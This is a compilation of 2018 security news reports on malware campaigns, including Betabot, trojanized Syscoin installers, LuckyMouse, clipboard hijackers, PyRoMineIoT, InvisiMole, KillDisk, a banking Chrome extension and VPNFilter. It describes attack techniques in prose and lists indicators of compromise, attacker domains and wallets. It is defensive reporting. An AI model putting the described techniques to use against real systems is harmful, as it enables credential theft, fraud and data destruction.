The inteldriverupd1.sct file leverages Windows Script Component and creates a new object, which next runs the task.bat script to check for a block.txt file in the temp directory, create the file if it doesn’t exist, and start 2nd.bat before deleting itself.
The 2nd.bat script starts the main exe file and kills the Word process, then deletes the Resiliency directory from registry to hide its tracks and prevent recovery of the document. The script also deletes other tracks of presence. Decoy.doc is displayed to the user after infection.
At the time of execution, the threat was observed connecting to hxxp://goog[.]com/newbuild/t.php?stats=send&thread=0, security researcher Wojciech reveals.
Written in C#, the exe.exe file shows multiple layers of obfuscation, the first being the DeepSea algorithm, followed by simple XOR and Modulo operations. Deobfuscation reveals a new file with many embedded images in its resources. These are used in the next stage.
Next, the researcher found a .Net file featuring encrypted strings. This layer is meant to decrypt another file and store it in dictionary with other information related to malware configuration. For that, it retrieves said images from resources, changes them into memory stream, decrypts them, and adds them to dictionary.
During execution, the threat also checks for the configuration from dictionary and calls the appropriate function. These functions allow it to, among others, check if it runs in a virtual environment and copy itself to the start menu.
At the last stage of the attack, a new variant of Betabot is deployed. The sample contains some anti-debugging and anti-virtualization tricks, then initiates communication with a domain, likely for tracking purposes. The researcher also noticed some redirections using said tracking values, likely meant to earn some additional money from an affiliate program.
The malware also communicates with a command and control (C&C) server at onedriveservice[.]com, which is clearly not a genuine Microsoft domain.
Compromised GitHub Account Spreads Malicious Syscoin Installers
18.6.2018 securityweek Virus
Malware-laden Syscoin releases were up for download on an official GitHub repository after hackers managed to compromise an account and replace legitimate Windows installers.
The malicious releases were posted on the Syscoin GitHub release page on June 9 and remained there until June 13. Only the Windows Syscoin 3.0.4.1 installers (syscoincore-3.0.4-win32-setup.exe and syscoincore-3.0.4-win64-setup.exe) were affected.
In a security notice published on Syscoin’s official account on the soon-to-be Microsoft owned GitHub, the developers explain that the malicious code included in the modified installers is detected as Trojan:Win32/Feury.B!cl.
Mac and Linux releases were not modified by the hackers. Windows users who downloaded the ZIP files weren’t affected either (all users who did not download or execute the Syscoin 3.0.4.1 setup binaries are safe).
“This may affect Windows users who downloaded and executed the Syscoin 3.0.4.1 Windows setup binaries from Github between June 09th, 2018 10:14 PM UTC & June 13th, 2018 10:23 PM UTC,” the security notice reads.
“Please be aware this exploit method could potentially affect other blockchain projects on Github,” Blockchain Foundry notes in the Syscoin 3.0.5’s release announcement.
Windows users are advised to check the installation date for their Syscoin and make sure they did not download and execute releases containing the malicious code.
If the modified/installation date is between June 9, 2018, and June 13, 2018, users are advised to back up important data (including wallets) and make sure it does not contain infectious code, then scan their system with an anti-virus application.
They should also change passwords entered in the timeframe (the malware is a keylogger), secure any funds stored in “unencrypted wallets or wallets that had been unlocked during the infection period.”
Windows users who downloaded the corrupted binaries are also advised to run a GenericKD Trojan removal guide before restarting the system, as the Trojan might log entered passwords.
The hack was discovered after the Blockchain Foundry team received reports that the syscoincore-3.0.4-win64-setup.exe binary was being flagged as a potential virus by Windows Defender SmartScreen, AVG, and Kaspersky.
“Investigation into the issue revealed the original Github Windows setup binaries for release 3.0.4.1 had been modified and replaced with a malicious version through a compromised Github account. Upon discovery, the 3.0.4.1 setup binaries were removed from Github and replaced with official, signed versions of the binaries,” Syscoin reveals.
The malicious binaries were immediately removed from the repository and replaced with the legitimate ones. To prevent similar incidents, Syscoin developers and Blockchain Foundry staff with Github access are now required to have 2-step authentication enabled, to routinely check signature hashes, and to “work with Github to ensure users will be able to detect if binaries have been altered after release.”
“Although the issue was detected quickly, we believe that the crypto-community is at risk for a specific type of attack which targets gatekeepers of source code for cryptocurrency projects. We highly recommend that all gatekeepers of software repositories for cryptocurrency projects sign binaries through an official build process like Gitian,” Syscoin notes.
LuckyMouse hits national data center to organize country-level waterholing campaign
17.6.2018 Kaspersky APT Virus
In March 2018 we detected an ongoing campaign targeting a national data center in the Central Asia that we believe has been active since autumn 2017. The choice of target made this campaign especially significant – it meant the attackers gained access to a wide range of government resources at one fell swoop. We believe this access was abused, for example, by inserting malicious scripts in the country’s official websites in order to conduct watering hole attacks.
The operators used the HyperBro Trojan as their last-stage in-memory remote administration tool (RAT). The timestamps for these modules are from December 2017 until January 2018. The anti-detection launcher and decompressor make extensive use of Metasploit’s shikata_ga_nai encoder as well as LZNT1 compression.
Kaspersky Lab products detect the different artifacts used in this campaign with the following verdicts: Trojan.Win32.Generic, Trojan-Downloader.Win32.Upatre and Backdoor.Win32.HyperBro. A full technical report, IoCs and YARA rules are available from our intelligence reporting service (contact us intelligence@kaspersky.com).
Who’s behind it?
Due to tools and tactics in use we attribute the campaign to LuckyMouse Chinese-speaking actor (also known as EmissaryPanda and APT27). Also the C2 domain update.iaacstudio[.]com was previously used in their campaigns. The tools found in this campaign, such as the HyperBro Trojan, are regularly used by a variety of Chinese-speaking actors. Regarding Metasploit’s shikata_ga_nai encoder – although it’s available for everyone and couldn’t be the basis for attribution, we know this encoder has been used by LuckyMouse previously.
Government entities, including the Central Asian ones also were a target for this actor before. Due to LuckyMouse’s ongoing waterholing of government websites and the corresponding dates, we suspect that one of the aims of this campaign is to access web pages via the data center and inject JavaScripts into them.
How did the malware spread?
The initial infection vector used in the attack against the data center is unclear. Even when we observed LuckyMouse using weaponized documents with CVE-2017-118822 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we can´t prove they were related to this particular attack. It’s possible the actor used a waterhole to infect data center employees.
The main C2 used in this campaign is bbs.sonypsps[.]com, which resolved to IP-address, that belongs to the Ukrainian ISP network, held by a Mikrotik router using firmware version 6.34.4 (from March 2016) with SMBv1 on board. We suspect this router was hacked as part of the campaign in order to process the malware’s HTTP requests. The Sonypsps[.]com domain was last updated using GoDaddy on 2017-05-05 until 2019-03-13.
FMikrotik router with two-year-old firmware and SMBv1 on board used in this campaign
In March 2017, Wikileaks published details about an exploit affecting Mikrotik called ChimayRed. According to the documentation, however, it doesn’t work for firmware versions higher than 6.30. This router uses version 6.34.
There were traces of HyperBro in the infected data center from mid-November 2017. Shortly after that different users in the country started being redirected to the malicious domain update.iaacstudio[.]com as a result of the waterholing of government websites. These events suggest that the data center infected with HyperBro and the waterholing campaign are connected.
What did the malware do in the data center?
Anti-detection stages. Different colors show the three dropped modules: legit app (blue), launcher (green), and decompressor with the Trojan embedded (red)
The initial module drops three files that are typical for Chinese-speaking actors: a legit Symantec pcAnywhere (IntgStat.exe) for DLL side loading, a .dll launcher (pcalocalresloader.dll) and the last-stage decompressor (thumb.db). As a result of all these steps, the last-stage Trojan is injected into svchost.exe’s process memory.
The launcher module, obfuscated with the notorious Metasploit’s shikata_ga_nai encoder, is the same for all the droppers. The resulting deobfuscated code performs typical side loading: it patches pcAnywhere’s image in memory at its entry point. The patched code jumps back to the decryptor’s second shikata_ga_nai iteration, but this time as part of the whitelisted application.
This Metasploit’s encoder obfuscates the last part of the launcher’s code, which in turn resolves the necessary API and maps thumb.db into the same process’s (pcAnywhere) memory. The first instructions in the mapped thumb.db are for a new shikata_ga_nai iteration. The decrypted code resolves the necessary API functions, decompresses the embedded PE file with RtlCompressBuffer() using LZNT1 and maps it into memory.
What does the resulting watering hole look like?
The websites were compromised to redirect visitors to instances of both ScanBox and BEeF. These redirects were implemented by adding two malicious scripts obfuscated by a tool similar to the Dean Edwards packer.
Resulting script on the compromised government websites
Users were redirected to https://google-updata[.]tk:443/hook.js, a BEeF instance, and https://windows-updata[.]tk:443/scanv1.8/i/?1, an empty ScanBox instance that answered a small piece of JavaScript code.
Conclusions
LuckyMouse appears to have been very active recently. The TTPs for this campaign are quite common for Chinese-speaking actors, where they typically provide new solid wrappers (launcher and decompressor protected with shikata_ga_nai in this case) around their RATs (HyperBro).
The most unusual and interesting point here is the target. A national data center is a valuable source of data that can also be abused to compromise official websites. Another interesting point is the Mikrotik router, which we believe was hacked specifically for the campaign. The reasons for this are not very clear: typically, Chinese-speaking actors don’t bother disguising their campaigns. Maybe these are the first steps in a new stealthier approach.
Some indicators of compromise
Droppers
22CBE2B0F1EF3F2B18B4C5AED6D7BB79
0D0320878946A73749111E6C94BF1525
Launcher
ac337bd5f6f18b8fe009e45d65a2b09b
HyperBro in-memory Trojan
04dece2662f648f619d9c0377a7ba7c0
Domains and IPs
bbs.sonypsps[.]com
update.iaacstudio[.]com
wh0am1.itbaydns[.]com
google-updata[.]tk
windows-updata[.]tk
ClipboardWalletHijacker miner hijacks your Ether and Bitcoin transaction, over 300,000 computers have been infected
17.6.2018 securityaffairs Virus
Researchers uncovered a new malware campaign spreading a clipboard hijacker dubbed ClipboardWalletHijacker that has already infected over 300,000 computers.
Security researchers from Qihoo 360 Total Security have spotted a new malware campaign spreading a clipboard hijacker, tracked as ClipboardWalletHijacker, that has already infected over 300,000 computers. Most of the victims are located in Asia, mainly China.
“Recently, 360 Security Center discovered a new type of actively spreading CryptoMiner, ClipboardWalletHijacker. The Trojan monitors clipboard activity to detect if it contains the account address of Bitcoin and Ethereum.” reads the analysis published by the company.
“It tampers with the receiving address to its own address to redirect the cryptocurrency to its own wallet. This kind of Trojans has been detected on more than 300 thousand computers within a week.”
Modus operandi for ClipboardWalletHijacker is not a novelty, the malware is able to monitor the Windows clipboard looking for Bitcoin and Ethereum addresses and replace them with the address managed by the malware’s authors.
In March 2018, researchers at Palo Alto Networks discovered a malware dubbed ComboJack that is able of detecting when users copy a cryptocurrency address and alter clipboards to steal cryptocurrencies and payments.
In a similar way, ClipboardWalletHijacker aims at hijacking BTC and ETH transactions.
Experts observed the malware using the following addresses when replacing legitimate ones detected in users’ clipboards:
BTC: 1FoSfmjZJFqFSsD2cGXuccM9QMMa28Wrn1
BTC: 19gdjoWaE8i9XPbWoDbixev99MvvXUSNZL
ETH: 0x004D3416DA40338fAf9E772388A93fAF5059bFd5
below the function the replace the legitimate Ethereum wallet address with the attackers’ one:
By replacing the address with the following one: “0x004D3416DA40338fAf9E772388A93fAF5059bFd5” the hackers have successfully hijacked 46 transactions.
Below the balances of these addresses:
https://blockchain.info/address/1FoSfmjZJFqFSsD2cGXuccM9QMMa28Wrn1
https://blockchain.info/address/19gdjoWaE8i9XPbWoDbixev99MvvXUSNZL
https://etherscan.io/address/0x004D3416DA40338fAf9E772388A93fAF5059bFd5
Hackers have stolen a total 0.12434321 BTC from eight transactions and no Ether, for a total of around $800.
Recently Qihoo discovered many other miners, such as TaksHostMiner and WagonlitSwfMiner that infected dozens of thousands of machines.
“Recently, we have found that a lot of CryptoMiner Trojans are using this technique to steal victims’ cryptocurrencies.” concludes the company. “We strongly recommend users to enable antivirus software while installing new applications. Users are also recommended to run virus scan with 360 Total Security to avoid falling victim to CryptoMiner.”
PyRoMineIoT spreads via EternalRomance exploit and targets targets IoT devices in Iran and Saudi Arabia.
13.6.2018 securityaffairs Virus
Fortinet discovered PyRoMineIoT, a new strain of crypto-currency miner that exploits the NSA-linked EternalRomance exploit to spread.
PyRoMineIoT is a new strain of crypto-currency miner that exploits the NSA-linked EternalRomance remote code execution exploit to spread, the malware also abuses infected machines to scan for vulnerable Internet of Things (IoT) devices.
PyRoMineIoT is quite similar to another crypto-currency miner dubbed PyRoMine that was first spotted a few weeks ago, its infections rapidly increased since April, most of them in Singapore, India, Taiwan, Côte d’Ivoire, and Australia.
According to Fortinet, the older miner was improved with some obfuscation, the latest variant PyRoMine is hosted on the same IP address 212[.]83.190[.]122, and both variants leverage the EternalRomance implementation found on the Exploit Database website.
PyRoMineIoT is delivered from a website disguised as security updates for web browsers.
Once the PyRoMineIoT malware has compromised a device, it will download an obfuscated VBScript that has the same functionality as the one used by the PyRoMine variant, but its code appears well organized.
The VBScript also downloads other components, including a Monero miner (XMRig), but differently from previous variant it uses ransom names for the files.
“As with the previous version of PyRoMine, this new version is hosted on the same IP address 212.83.190.122. The downloaded file is an executable compiled with PyInstaller, which is a program that packages programs written in Python into stand-alone executables. This means that there is no need to install Python on the machine in order to execute the Python program.” reads the analysis published by Fortinet.
Both variants sets up a Default account with the password P@ssw0rdf0rme and adds the account to the local groups “Administrators,” “Remote Desktop Users,” and “Users,” then it enables RDP and adds a firewall rule to allow traffic on port 3389.
Once compromised a device, PyRoMineIoT attempts to remove PyRoMine variant if present.
The analysis of one of the pool addresses used by the threat actors behind the malware revealed it earned around 5 Monero (about $850).
The victim downloads a fake update as .zip archives containing a downloader written in C# that fetches the miner file, a Python-based malware that leverages EternalRomance to spread the downloader, and other malicious components.
“One of the downloaded components is a Python-based malware that takes advantage of the NSA exploit ETERNALROMANCE to spread the agent to vulnerable machines in the network. Another component is a tool that steals user credentials from Chrome browser named ChromePass.” continues the analysis.
“Another component scans for vulnerable IoT devices in Iran and Saudi Arabia that use the login credentials “admin” for username and password.”
pyromineiot
The EternalRomance implementation collects the IPs of local subnets and targets them to spread using credentials with username ‘aa’ and an empty password.
Another component used by the malware is the legitimate software ChromePass that allows seeing credentials from Chrome.
Once the credentials are collected by the malware, it saves them in XML format and uploads the file to an account on DriveHQ’s cloud storage service.
PyRoMineIoT searches for vulnerable IoT devices, but at the time it only targets those in Iran and Saudi Arabia.
“This development confirms yet again that malware authors are very interested in cryptocurrency mining, as well as in capturing a chunk of the IoT threat ecosystem.” Fortinet concludes.
“We predict that this trend will not fade away soon, but will continue as long as there are opportunities for the bad guys to easily earn money by targeting vulnerable machines and devices,”
New 'PyRoMineIoT' Malware Spreads via NSA-Linked Exploit
12.6.2018 securityweek Virus
A recently discovered piece of crypto-currency miner malware isn’t only abusing a National Security Agency-linked remote code execution exploit to spread, but also abuses infected machines to scan for vulnerable Internet of Things (IoT) devices.
Dubbed PyRoMineIoT, the malware is similar to the PyRoMine crypto-currency miner that was detailed in late April. Both mine for Monero, both are Python-based, and both use the EternalRomance exploit for propagation purposes (the vulnerability was patched in April last year).
The older threat, Fortinet’s Jasper Manuel reveals, has received an update to add some obfuscation, likely in an attempt to evade detection from anti-virus programs.
The latest PyRoMine variant is hosted on the same IP address 212[.]83.190[.]122, was compiled with PyInstaller into a stand-alone executable, and continues to use the EternalRomance implementation found on the Exploit Database website, the same as the initially analyzed variant.
After a successful exploitation, an obfuscated VBScript is downloaded. The VBScript has the same functionality as the previously used one, but features more organized code and also adds a version number.
The same as before, it sets up a Default account with the password P@ssw0rdf0rme and adds the account to the local groups “Administrators,” “Remote Desktop Users,” and “Users,” after which it enables RDP and adds a firewall rule to allow traffic on port 3389.
The VBScript also downloads other components, including a Monero miner (XMRig), but now uses randomly generated names for these files. The malware attempts to remove older versions of PyRoMine from the system.
One of the pool addresses used by the malware suggests the actors made around 5 Monero (about $850) from their nefarious activities. The malware has infected a large number of systems since April, with the top 5 affected countries being Singapore, India, Taiwan, Côte d’Ivoire, and Australia.
The newly discovered PyRoMineIoT, Manuel says, is similar to PyRoMine, hence the similar naming. The threat is served from “an obviously malicious looking website,” disguised as security updates for web browsers.
The fake updates are downloaded as .zip archives that contain a downloader agent written in C#. This agent fetches the miner file and other malicious components, including a Python-based malware that leverages EternalRomance to spread the downloader to vulnerable machines in the network.
The agent also fetches a component to steal user credentials from Chrome, and another to scan for IoT devices in Iran and Saudi Arabia that use the admin: admin username and password pair.
The EternalRomance implementation uses the same code base as PyRoMine and works in a similar manner, collecting the IPs of local subnets and iterating through them to execute the payload. It uses the username ‘aa’ with an empty password.
The second component is part of the legitimate ChromePass tool that allows users to recover passwords from the Chrome browser. As part of these attacks, it is abused to steal credentials from unsuspecting users: the tool saves the recovered credentials in XML format and uploads the file to an account on DriveHQ’s cloud storage service (the account has been already disabled).
The most interesting aspect of this malware, however, is its ability to search for vulnerable IoT devices, but it only targets those in Iran and Saudi Arabia for that. The threat sends the IP information of discovered devices to the attacker’s server, supposedly in preparation for further attacks.
The same as PyRoMine, the malware downloads the XMRig miner on the compromised system. After checking one of the pool addresses used by the threat, however, the researcher discovered that it hasn’t generated revenue yet. This, however, isn’t surprising, considering that the malware only started being distributed on June 6, 2018, and is an unfinished project.
“This development confirms yet again that malware authors are very interested in cryptocurrency mining, as well as in capturing a chunk of the IoT threat ecosystem. We predict that this trend will not fade away soon, but will continue as long as there are opportunities for the bad guys to easily earn money by targeting vulnerable machines and devices,” Fortinet concludes.
InvisiMole Spyware is a powerful malware that went undetected for at least five years
11.6.2018 securityaffairs Virus
Malware researchers from ESET have spotted a new sophisticated piece of spyware, tracked as InvisiMole, used in targeted attacks in Russia and Ukraine in the last five years.
Experts still haven’t attributed the malware to any threat actor, InvisiMole could be a nation-state malware developed for cyber espionage purpose or the result of a development of a financially-motivated group.
The researchers have discovered only a few dozen samples in the wild, the malicious code implements a broad range of features thanks it modular architecture that make the threat very versatile.
“Our telemetry indicates that the malicious actors behind this malware have been active at least since 2013, yet the cyber-espionage tool was never analyzed nor detected until discovered by ESET products on compromised computers in Ukraine and Russia.” reads the report published by ESET.“The campaign is highly targeted – no wonder the malware has a low infection ratio, with only a few dozen computers being affected.”
At the time the experts still haven’t discovered the attack vector and there is no info about the types of campaigns in which it was involved.
Experts don’t exclude any infection vector, including installation facilitated by physical access to the machine.
The modular structure of the InvisiMole spyware is composed of a wrapper DLL that leverages two other backdoor modules that are embedded in its resources to conduct its activities.
According to the researchers, the authors of the InvisiMole spyware have removed any clue that could attribute the malware to a specific actor, the unique exception is represented by the compilation data of a single file (dating to October 13, 2013). Compilation dates for all the remaining files have been removed by the authors.
The main module is called RC2FM and supports 15 commands that allow the attacker to search and exfiltrate data from the infected system.
The RC2FM supports commands for gathering system information and performing simple changes on the system, it also includes spyware features like the control of the microphone and user’s webcam.
The second module, dubbed RC2CL, is greater and more advanced than RC2FM, it is able to extract proxy settings from browsers and use those configurations to send data to the C&C server in the presence of a proxy.
“This module communicates with C&C servers that are either hardcoded in the sample, or updated later by the attackers.” continues the analysis.
“Moreover, the module is able to reach out to the C&C servers even if there is a proxy configured on the infected computer. If a direct connection is unsuccessful, the module attempts to connect to any of its C&C servers using locally-configured proxies or proxies configured for various browsers (Firefox, Pale Moon, and Opera).”
The RC2CL module supports 84 backdoor commands and implements almost all the spyware capabilities, including the ability to run remote shell commands, registry key manipulation, file execution, getting a list of local apps, loading drivers, getting network information, disabling UAC, and turning off the Windows firewall.
RC2CL can also record audio via the microphone and take screenshots via the webcam, in the same way the InvisiMole spyware can do with the first module.
The RC2CL module also implements a safe-delete feature to avoid forensic investigation.
“Another example of how the malware authors attempt to act covertly is the way they treat traces left on the disk. The malware collects loads of sensitive data, which are then temporarily stored in files and deleted after they have been successfully uploaded to the C&C servers.Even the deleted files can, however, be recovered by an experienced system administrator, which could help further investigation of the attack – after the victim becomes aware of it.“continues the report.
“This is possible due to the fact that some data still reside on a disk even after a file is deleted. To prevent this, the malware has the ability to safe-delete all the files, which means it first overwrites the data in a file with zeroes or random bytes, and only then is the file deleted.”
The full list of IoCs related to the threat can be found on GitHub.
Trend Micro spotted a new variant of KillDisk wiper in Latin America
9.6.2018 securityaffairs Virus
In May, experts at Trend Micro observed a new sample of KillDisk in Latin America, the malware infected the systems of a bank.
A new piece of the KillDisk wiper was observed spotted earlier this year targeting financial organizations in Latin America, Trend Micro reports.
The destructive malware was involved in the attacks against Ukraine’s grid in December 2015, the attack was attributed to a Russia-linked APT group tracked as BlackEnergy.
In December 2016, researchers at security firm CyberX discovered a variant of the KillDisk malware that implemented ransomware features.
In May, experts at Trend Micro observed a master boot record (MBR)-wiping malware in Latin America, the malicious code infected the systems of a bank with a severe impact on their operations.
According to the experts, the hacker failed the attack because the real goal was obtaining the access to SWIFT network.
“Last May, we uncovered a master boot record (MBR)-wiping malware in the same region. One of the affected organizations was a bank whose systems were rendered inoperable for several days, thereby disrupting operations for almost a week and limiting services to customers.” reads the analysis published by Trend Micro.
“Our analysis indicates that the attack was used only as a distraction — the end goal was to access the systems connected to the bank’s local SWIFT network.”
The malware researchers determined that the malicious code was a strain of the dreaded Killdisk due to on the error message displayed by the affected systems.
The analysis of the payload makes it difficult to determine the motivation behind the attack.
The experts analyzed a sample of that variant and discovered it was created with Nullsoft Scriptable Install System (NSIS), which is an open-source application used to create setup programs.
The sample was named by the author as “MBR Killer,” the sample included a routine to wipe the first sector of the machine’s physical disk.
The sample was protected by VMProtect, a tool used to prevent reverse engineering of the code in a virtualized environment.
The analysis of the sample did not reveal any connection to a command-and-control (C&C) infrastructure neither the presence of ransomware-like routines.
“We haven’t found any other new or notable routines in the sample we have. There is no evident command-and-control (C&C) infrastructure or communication, or ransomware-like routines coded into the sample. There are no indications of network-related behavior in this malware.” continues the analysis.
The malware wipes all physical hard disks on the infected system, it retrieves the handle of the hard disk and overwrites the first sector of the disk (512 bytes) with “0x00”, then forces the machine to shut down.
“The destructive capabilities of this malware, which can render the affected machine inoperable, underscore the significance of defense in depth: arraying security to cover each layer of the organization’s IT infrastructure, from gateways and endpoints to networks and servers,” concludes Trend Micro.
The report also included Indicators of Compromises (IoCs)
New KillDisk Variant Hits Latin America
8.6.2018 securityweek Virus
A new version of the destructive KillDisk malware was observed earlier this year targeting organizations in Latin America, Trend Micro reports.
KillDisk has been around for several years, and was used in attacks targeting Ukraine’s energy sector in 2015, orchestrated by the Russia-linked threat actor BlackEnergy.
Initially designed to wipe hard drives and render systems inoperable, the malware received file-encrypting capabilities in late 2016, with a Linux-targeting variant of the ransomware spotted shortly after.
In January, Trend Micro security researchers observed a new variant of the malware in Latin America, and revealed that the threat was once again deleting files and wiping the disk.
One of the attacks, the security firm reveals, was related to a foiled heist on the organization’s system connected to the SWIFT network (Society for Worldwide Interbank Financial Telecommunication).
In May, the security firm observed a master boot record (MBR)-wiping malware in the region, with one of the impacted organizations being a bank “whose systems were rendered inoperable for several days.” The attack, however, was deemed a distraction, as the actor behind it was in fact focused on accessing systems connected to the bank’s local SWIFT network.
The researchers also discovered that the malware used in this attack was a new variant of KillDisk, based on the error message displayed by the affected systems (common to machines infected with MBR-wiping threats).
“The nature of this payload alone makes it difficult to determine if the attack was motivated by an opportunistic cybercriminal campaign or part of a coordinated attack like the previous attacks we observed last January,” Trend Micro says.
The malware used in the May attack was created using Nullsoft Scriptable Install System (NSIS), with the actor purposely naming it “MBR Killer.” Analysis of the sample revealed a routine to wipe the first sector of the machine’s physical disk.
The security researchers also say they haven’t found other new or notable routines in the sample and that no command-and-control (C&C) infrastructure or communication were observed. Furthermore, no ransomware-like routines were found in the malware, nor network-related behavior.
The threat can wipe all of the physical hard disks on the infected system. To wipe the MBR, it retrieves the handle of the hard disk, overwrites the first sector of the disk (512 bytes) with “0x00”, attempts the same routine on all hard disks, then forces the machine to shut down.
“The destructive capabilities of this malware, which can render the affected machine inoperable, underscore the significance of defense in depth: arraying security to cover each layer of the organization’s IT infrastructure, from gateways and endpoints to networks and servers,” Trend Micro notes.
A MitM extension for Chrome
8.6.2018 Kaspersky Virus
Browser extensions make our lives easier: they hide obtrusive advertising, translate text, help us choose in online stores, etc. There are also less desirable extensions, including those that bombard us with advertising or collect information about our activities. These pale into insignificance, however, when compared to extensions whose main aim is to steal money. To protect our customers, we automatically process large numbers of extensions from a variety of sources. This includes downloading and analyzing suspicious extensions from Chrome Web Store. One extension, in particular, recently caught our attention because it communicated with a suspicious domain.
The Google Chrome extension named Desbloquear Conteúdo (which means ‘Unblock Content’ in Portuguese) targeted users of Brazilian online banking services – all the attempted installations that we traced occurred in Brazil. The aim of this malicious extension is to harvest user logins and passwords and then steal money from their bank accounts. Kaspersky Lab products detect the extension as HEUR:Trojan-Banker.Script.Generic.
Geographic distribution of security product detections of the script fundo.js, one of the extension components
By the time of publication, the malicious extension had already been removed from Chrome Web Store.
The malicious extension in Chrome Web Store
Analysis of malicious extension
Malicious browser extensions often use different techniques (e.g. obfuscation) to prevent detection by security software. The developers of this specific extension, however, didn’t obfuscate its source code, opting instead for a different approach. This piece of malware uses the WebSocket protocol for data communication, making it possible to exchange messages with the C&C server in real time. This means the C&C starts acting as a proxy server to which the extension redirects traffic when the victim visits the site of a Brazilian bank. Essentially, this is a man-in-the-middle attack.
The Desbloquear Conteúdo extension consists of two JS scripts. Let’s take a closer look at them.
fundo.js
The first thing that catches the eye in the script’s code is the function websocket_init(). This is where a WebSocket connection is established. Data is then downloaded from the server (ws://exalpha2018[.]tk:2018) and saved to chrome.storage under the key ‘manualRemovalStorage’.
Download of data from C&C via a WebSocket connection
Data downloaded and saved by the extension
As a result of contacting hxxp://exalpha2018[.]tk/contact-server/?modulo=get, the extension receives the IP address to which user traffic will be redirected.
IP address received from C&C server
The IP to which all user traffic is then redirected
It’s worth mentioning here the Proxy Auto Configuration technology. Modern browsers use a special file written in JavaScript which has just one function: FindProxyForURL. With this function, the browser defines which proxy server to use to establish a connection to various domains.
The fundo.js script uses the Proxy Auto Configuration technology at the time of the function call implement_pac_script. This results in the function FindProxyForURL being replaced with a new one that redirects user traffic to the malicious server, but only when a user visits the web page of a Brazilian bank.
Changing browser settings to redirect user traffic
pages.js
In this script, the following section of code is the most important:
Execution of the downloaded malicious code on web pages belonging to banks
Just like with fundo.js, data downloaded from the server is saved to manualRemovalStorage. The data includes the domains of several Brazilian banks and the code the browser should execute if a user visits one of the relevant sites.
pages.js downloads the following scripts from the domain ganalytics[.]ga and launches them on the banks’ sites:
ganalytics[.]ga/bbf.js,
ganalytics[.]ga/bbj.js,
ganalytics[.]ga/cef.js,
ganalytics[.]ga/itf.js,
ganalytics[.]ga/itf_new.js.
Web Antivirus detection statistics for attempts to contact ganalytics[.]ga
All the above scripts have similar functionalities and are designed to steal the user’s credentials. Let’s take a look at one of them.
cef.js
One of this script’s functions is to add specific HTML code to the main page of the online banking system.
Addition of malicious code to the web page
A closer look at the code that’s returned after contacting the server reveals that it’s needed to collect the one-time passwords used for authentication on the bank’s site.
Interception of users’ one-time passwords
If a user is on the page where logins and passwords are entered, the script creates a clone of the ‘Enter’ button. A function is also created to click this button. The password is stored in the cookie files of this function for subsequent transfer to the C&C and the real button, which is overlaid and hidden from the victim, is then clicked.
Copy of the ‘Enter’ button is created and the login and password for an online banking service are intercepted
As a result, the password to the user’s account is sent to the online banking system as well as to the malicious server.
Sending of all intercepted data to the C&C
Additional analysis of the web resources used in the attack (courtesy of the KL Threat Intelligence Portal) yields some interesting information. In particular, the aforementioned ganalytics[.]ga is registered in the Gabon domain zone, which is why WHOIS services don’t provide much information about it:
WHOIS info for ganalytics[.]ga
However, the IP address where it’s hosted is also associated with several other interesting domains.
A fragment of DNS data from KSN
It’s clear that this IP address is (or was) associated with several other domains with tell-tale names containing the keywords advert, stat, analytic and registered in Brazil’s domain zone. It’s noteworthy that many of them were involved in distributing web miners last autumn, with the mining scripts being downloaded when legitimate Brazilian bank sites were visited.
Fragments of KSN data related to advstatistics.com[.]br
When malware is loaded while the user is visiting a legitimate site, it usually indicates that traffic is being modified locally on the user’s computer. Other things about this case, namely the fact that it targeted Brazilian users and that it used the same IP address that was used in previous attacks, suggest that this browser extension (or related versions of it) earlier had functionality to add cryptocurrency mining scripts to the banking sites users were visiting at the moment the extension was downloaded to their devices.
Conclusion
Browser extensions designed to steal logins and passwords are quite rare. However, they need to be taken seriously given the potential damage they could cause. We recommend that users only install verified extensions with large numbers of installations and reviews in Chrome Web Store or another official service. In spite of the protection measures implemented by the owners of such services, malicious extensions can still end up being published in them – we’ve covered one such case. Also, it wouldn’t hurt to have a security product installed on your device that issues a warning whenever an extension acts suspiciously.
Destructive and MiTM Capabilities of VPNFilter Malware Revealed
8.6.2018 thehackernews Virus
It turns out that the threat of the massive VPNFilter botnet malware that was discovered late last month is beyond what we initially thought.
Security researchers from Cisco's Talos cyber intelligence have today uncovered more details about VPNFilter malware, an advanced piece of IoT botnet malware that infected more than 500,000 routers in at least 54 countries, allowing attackers to spy on users, as well as conduct destructive cyber operations.
Initially, it was believed that the malware targets routers and network-attached storage from Linksys, MikroTik, NETGEAR, and TP-Link, but a more in-depth analysis conducted by researchers reveals that the VPNFilter also hacks devices manufactured by ASUS, D-Link, Huawei, Ubiquiti, QNAP, UPVEL, and ZTE.
"First, we have determined that are being targeted by this actor, including some from vendors that are new to the target list. These new vendors are. New devices were also discovered from Linksys, MikroTik, Netgear, and TP-Lin," the researchers say.
To hijack devices manufactured by above listed affected vendors, the malware simply relies on publicly-known vulnerabilities or use default credentials, instead of exploiting zero-day vulnerabilities.
VPNFilter 'ssler' — Man-in-the-Middle Attack Module
Besides this, the researchers primarily shared technical details on a new stage 3 module, named "ssler," which is an advanced network packet sniffer that, if installed, allows hackers to intercept network traffic passing through an infected router and deliver malicious payloads using man-in-the-middle attacks.
"Ssler module provides data exfiltration and JavaScript injection capabilities by intercepting all traffic passing through the device destined for port 80," the researchers say.
This 3rd-stage module also makes the malware capable of maintaining a persistent presence on an infected device, even after a reboot.
The ssler module has been designed to deliver custom malicious payloads for specific devices connected to the infected network using a parameter list, which defines the module's behavior and which websites should be targeted.
These parameters include settings to define the location of a folder on the device where stolen data should be stored, the source and destination IP address for creating iptable rules, as well as the targeted URL of the JavaScript injection.
To setup packet sniffing for all outgoing web requests on port 80, the module configures the device's iptables immediately after its installation to redirect all network traffic destined for port 80 to its local service listening on port 8888.
"To ensure that these rules do not get removed, ssler deletes them and then adds them back approximately every four minutes," the researchers explain.
To target HTTPS requests, the ssler module also performs SSLStrip attack, i.e., it downgrades HTTPS connections to HTTP, forcing victim web browsers into communicating over plaintext HTTP.
VPNFilter 'dstr' — Device Destruction Module
As briefed in our previous article, VPNFilter also has a destructive capability (dstr module) that can be used to render an infected device unusable by deleting files necessary for normal device operation.
The malware triggers a killswitch for routers, where it first deliberately kills itself, before deleting the rest of the files on the system [named vpnfilter, security, and tor], possibly in an attempt to hide its presence during the forensic analysis.
This capability can be triggered on individual victim machines or en masse, potentially cutting off internet access for hundreds of thousands of victims worldwide.
Simply Rebooting Your Router is Not Enough
Despite the FBI seizure of a key command and control server right after the discovery of VPNFilter, the botnet still remains active, due to its versatile, multi-stage design.
